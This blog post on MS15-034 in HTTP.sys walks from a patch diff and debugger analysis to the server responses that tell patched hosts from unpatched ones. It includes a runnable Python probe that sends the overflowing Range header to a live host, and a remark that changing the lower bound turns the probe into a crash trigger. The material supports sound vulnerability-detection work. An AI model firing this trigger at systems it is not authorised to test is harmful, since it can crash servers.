The Delicate Art of Remote Checks – A Glance Into MS15-034

April 15, 2015


Recently, the research team posted a testing script for the MS15-034 vulnerability (the HTTP.sys Range header flaw) to Pastebin for the wider community to use. We received a number of questions about how exactly we worked out the check, and about remote checks in general.

A remote check is a piece of code that determines whether a target is vulnerable by remotely exercising the code path a patch changed, rather than by trusting what the target says about itself. These checks became popular during the worm era as a way to reliably determine exploitability when a server's banner did not reveal its patch status. The exact process is hard to capture, since years of patch analysis at eEye (acquired by BeyondTrust in 2012) provide a measure of intuition.

One generally starts with a binary diff, and this case is no different. Let's examine the changes to HTTP.sys on Windows 7.

[Screenshot 1: binary diff of the changed HTTP.sys functions on Windows 7]

The notable takeaway is that every changed function name contains 'range'. This is exciting because it is reminiscent of the denial-of-service in Apache HTTPd's handling of the 'Range' header (CVE-2011-3192; the header itself is defined in RFC 2616 Section 14.35).

The conjecture that we are indeed dealing with the Range header is easy enough to verify. If we look at the caller of HTTP!UlpParseRange in IDA we see the following:

[Screenshot 2: IDA view of the caller of HTTP!UlpParseRange]

Since our goal is to audit this vulnerability, the next step is to attach a kernel debugger to an affected system; in our case a Windows 7 SP1 VMware guest. We prepare the target by setting breakpoints on all of the changed functions.

[Screenshot 3: kernel debugger breakpoints on the changed functions]

Each breakpoint prints a call stack and then continues execution. Since we already had the Apache RangeDos trigger lying around, we simply ran it against the VM; as a bonus it exercises quite a few Range header conditions. We get the following:

[Screenshot 4: call stack printed when the Apache RangeDos script hits a patched function]

So the standard Apache RangeDos script does hit one of the patched functions. Let's take a closer look at HTTP!UlpParseRange:

[Screenshot 14: HTTP!UlpParseRange, pre-patch]

The old code appears to be manipulating a 64-bit integer.

[Screenshot 5: HTTP!UlpParseRange, post-patch]

The new code uses a call to HTTP!RtlULongLongAdd to check for integer overflow. Note that this is not the standard three-parameter function but a five-parameter implementation inside HTTP.sys. If the add fails (for example with STATUS_INTEGER_OVERFLOW), the function returns 0xC000000D, STATUS_INVALID_PARAMETER.

After trimming a POC down to the minimum that reaches this function, it ends up being pretty simple.

[Screenshot 6: trimmed POC request]

Now we can set a breakpoint at the top of the changed block in the unpatched variant and watch what happens.

[Screenshot 7: breakpoint at the top of the changed block, unpatched]

This looks great: EAX holds 31337 (our upper bound) and EDI holds 1337 (our lower bound). In the old code, if the lower bound is 0 we subtract nothing from the upper bound and then add one to it. So if the upper bound is the maximum 64-bit value, adding one wraps it around to 0. This is clearer in the HexRays output:

*(_QWORD *)v18 = __PAIR__(v22, v23) - __PAIR__(v21, v20) + 1;

Let's try.

[Screenshot 8: upper bound set to a huge value]

We can see that our upper bound is now huge. Let's check the addition.

[Screenshot 9: result of the addition, EAX small]

EAX is predictably small now, since the sum has wrapped. Now that we have some idea of what the pre-patch block does, let's look at the patch again.

[Screenshot 10: patched code path]

Presumably, if we try the same trick here, an error is returned instead. What is interesting is that this error is returned from many places (the error block has a high in-degree in the graph). We suspect this is the key to checking for the patch. Let's turn our attention back to the unpatched scenario.
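To make the two arithmetic paths concrete, here is a Python model written for this article. It is an added example, not HTTP.sys code and not the Pastebin script. The NTSTATUS constants are the documented Windows values; parse_byte_range, rtl_ulonglong_add and the two range_length_* functions are sketches of the behaviour the screenshots show, with the rest of HTTP.sys's validation omitted. It generalizes slightly by running any LOW-HIGH range through both versions.

```python
# Added example: model of the range-length arithmetic in HTTP!UlpParseRange before
# and after MS15-034. Not HTTP.sys code; the NTSTATUS values are real Windows
# constants, the function bodies are sketches of the disassembly described above.
from __future__ import annotations

STATUS_SUCCESS = 0x00000000
STATUS_INTEGER_OVERFLOW = 0xC0000095
STATUS_INVALID_PARAMETER = 0xC000000D
U64_MAX = (1 << 64) - 1  # 18446744073709551615


def parse_byte_range(spec: str) -> tuple[int, int]:
    """Parse a 'bytes=LOW-HIGH' Range value into (low, high) Python ints.

    Only the two-sided form exercised in the post is modelled; suffix ranges
    ('bytes=-500') and multi-range lists are out of scope here.
    """
    unit, sep, rng = spec.partition("=")
    if unit != "bytes" or not sep:
        raise ValueError("unsupported range unit")
    low, sep, high = rng.partition("-")
    if not sep or not low or not high:
        raise ValueError("only LOW-HIGH ranges are modelled")
    return int(low), int(high)


def rtl_ulonglong_add(a: int, b: int) -> tuple[int, int]:
    """Model of RtlULongLongAdd: (status, sum), flagging a carry out of 64 bits."""
    total = a + b
    if total > U64_MAX:
        return STATUS_INTEGER_OVERFLOW, 0
    return STATUS_SUCCESS, total


def range_length_unpatched(low: int, high: int) -> tuple[int, int]:
    """Pre-patch arithmetic: (high - low) + 1 truncated to 64 bits, like the
    __PAIR__ expression in the HexRays output. The wrap-around is silent."""
    length = ((high - low) + 1) & U64_MAX
    return STATUS_SUCCESS, length


def range_length_patched(low: int, high: int) -> tuple[int, int | None]:
    """Post-patch arithmetic: the +1 goes through a checked add and any failure
    becomes STATUS_INVALID_PARAMETER, which HTTP.sys turns into 'Invalid Header'."""
    status, length = rtl_ulonglong_add((high - low) & U64_MAX, 1)
    if status != STATUS_SUCCESS:
        return STATUS_INVALID_PARAMETER, None
    return STATUS_SUCCESS, length


def compare(spec: str) -> dict:
    """Run one Range value through both versions and report what each would do."""
    low, high = parse_byte_range(spec)
    return {
        "range": spec,
        "unpatched": range_length_unpatched(low, high),
        "patched": range_length_patched(low, high),
    }


if __name__ == "__main__":
    # The debugger session above: lower 1337, upper 31337 -> 30001 bytes either way.
    print(compare("bytes=1337-31337"))
    # Lower bound 0 and upper bound 2**64-1: the old code wraps the length to 0,
    # the new code returns STATUS_INVALID_PARAMETER instead.
    print(compare(f"bytes=0-{U64_MAX}"))
```

The second call is the whole story of the check: identical input, a zero-length range on one side and an error status on the other, and that status is what the client ends up seeing.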

One of many ways to make the unpatched function return STATUS_INVALID_PARAMETER is to force the highlighted check below to fail.

[Screenshot 11: highlighted check in the unpatched function]

This is easy to do from the debugger. If we do, we get an interesting response:

[Screenshot 12: response with STATUS_INVALID_PARAMETER forced]

Contrast this with the response to the same script when the STATUS_INVALID_PARAMETER return is not forced:

[Screenshot 13: response without forcing the return value]

This difference is the core change that lets us tell patched from unpatched.

tl;dr: in the patched function, failure of the call to HTTP!RtlULongLongAdd makes HTTP!UlpParseRange return STATUS_INVALID_PARAMETER, which in turn makes HTTP.sys send an "Invalid Header" response (HTTP 400) to the client. In the unpatched scenario, HTTP!UlpParseRange returns 0 (success) with the wrapped range length, and the client gets a different error, "Requested Range Not Satisfiable" (HTTP 416).
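A remote check built on that difference looks like the following. This is an added example written for this article in the spirit of the team's script, not the Pastebin script itself. The Range value follows the arithmetic above (lower bound 0, upper bound 2**64-1); the 400/416 status codes, the Server-header gate, the request path "/" and the three sample replies are assumptions added here, and the samples are constructed rather than captured traffic.

```python
# Added example: MS15-034 remote check modelled on the approach in the post.
# Not the Pastebin script. The Server-header gate and the sample replies are
# assumptions of this example, not something the post states.
import socket
import sys

# Lower bound 0, upper bound 2**64-1: (high - low + 1) wraps to 0 in unpatched HTTP.sys.
PROBE_RANGE = "bytes=0-18446744073709551615"


def build_probe_request(host: str, path: str = "/") -> bytes:
    """Minimal HTTP/1.1 request carrying the wrapping Range header."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Range: {PROBE_RANGE}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


def served_by_http_sys(headers: str) -> bool:
    """Assumed gate: other servers also answer 416 to an absurd range, so the
    error text only says something about MS15-034 when HTTP.sys produced it."""
    for line in headers.split("\r\n"):
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "server":
            v = value.lower()
            return "microsoft-iis" in v or "microsoft-httpapi" in v
    return False


def classify_response(raw: bytes) -> str:
    """Map a raw reply to 'vulnerable', 'patched' or 'unknown' using the two
    error strings named in the tl;dr."""
    text = raw.decode("latin-1", "replace")
    head, _, body = text.partition("\r\n\r\n")
    if not served_by_http_sys(head):
        return "unknown"
    lowered = (head + body).lower()
    if "invalid header" in lowered:
        # UlpParseRange returned STATUS_INVALID_PARAMETER: patched.
        return "patched"
    if "requested range not satisfiable" in lowered:
        # The wrapped zero-length range reached the 416 path: unpatched.
        return "vulnerable"
    return "unknown"


def probe(host: str, port: int = 80, path: str = "/", timeout: float = 5.0) -> str:
    """Send the probe to a live host and classify the reply.
    Only run this against systems you are authorised to test."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_probe_request(host, path))
        while True:
            try:
                data = s.recv(4096)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
    return classify_response(b"".join(chunks))


# Constructed sample replies shaped like the two outcomes the post describes.
SAMPLE_UNPATCHED = (
    b"HTTP/1.1 416 Requested Range Not Satisfiable\r\n"
    b"Content-Type: text/html\r\n"
    b"Server: Microsoft-IIS/7.5\r\n"
    b"Content-Length: 0\r\n\r\n"
)
SAMPLE_PATCHED = (
    b"HTTP/1.1 400 Bad Request\r\n"
    b"Content-Type: text/html; charset=us-ascii\r\n"
    b"Server: Microsoft-HTTPAPI/2.0\r\n"
    b"Connection: close\r\n\r\n"
    b"<HTML><BODY><h2>Bad Request - Invalid Header</h2></BODY></HTML>"
)
SAMPLE_OTHER_SERVER = (
    b"HTTP/1.1 416 Requested Range Not Satisfiable\r\n"
    b"Server: nginx\r\n\r\n"
)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
        print(f"{target}:{port} -> {probe(target, port)}")
    else:
        for name, sample in (("unpatched", SAMPLE_UNPATCHED),
                             ("patched", SAMPLE_PATCHED),
                             ("nginx", SAMPLE_OTHER_SERVER)):
            print(f"{name:10s} -> {classify_response(sample)}")
```

Run it with a host (and optional port) to probe a live system, or with no arguments to see the three constructed replies classified offline. Keep the lower bound at 0: that is the variant whose only effect on an unpatched host is the wrapped length described above, and moving it is what turns a check into a crash trigger. Treat "unknown" as exactly that; a reverse proxy in front of IIS, a non-Microsoft server, or a response that carries neither error string gives no verdict either way.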

P.S. I will be speaking Monday, April 20th at BSidesSF2015 on "Probing Patches: Beyond Microsoft's ANS"


Scott Lang, Sr. Director, Product Marketing at BeyondTrust

Scott Lang has nearly 20 years of experience in technology product marketing, currently guiding the product marketing strategy for BeyondTrust’s privileged account management solutions and vulnerability management solutions. Prior to joining BeyondTrust, Scott was director of security solution marketing at Dell, formerly Quest Software, where he was responsible for global security campaigns, product marketing for identity and access management and Windows server management.
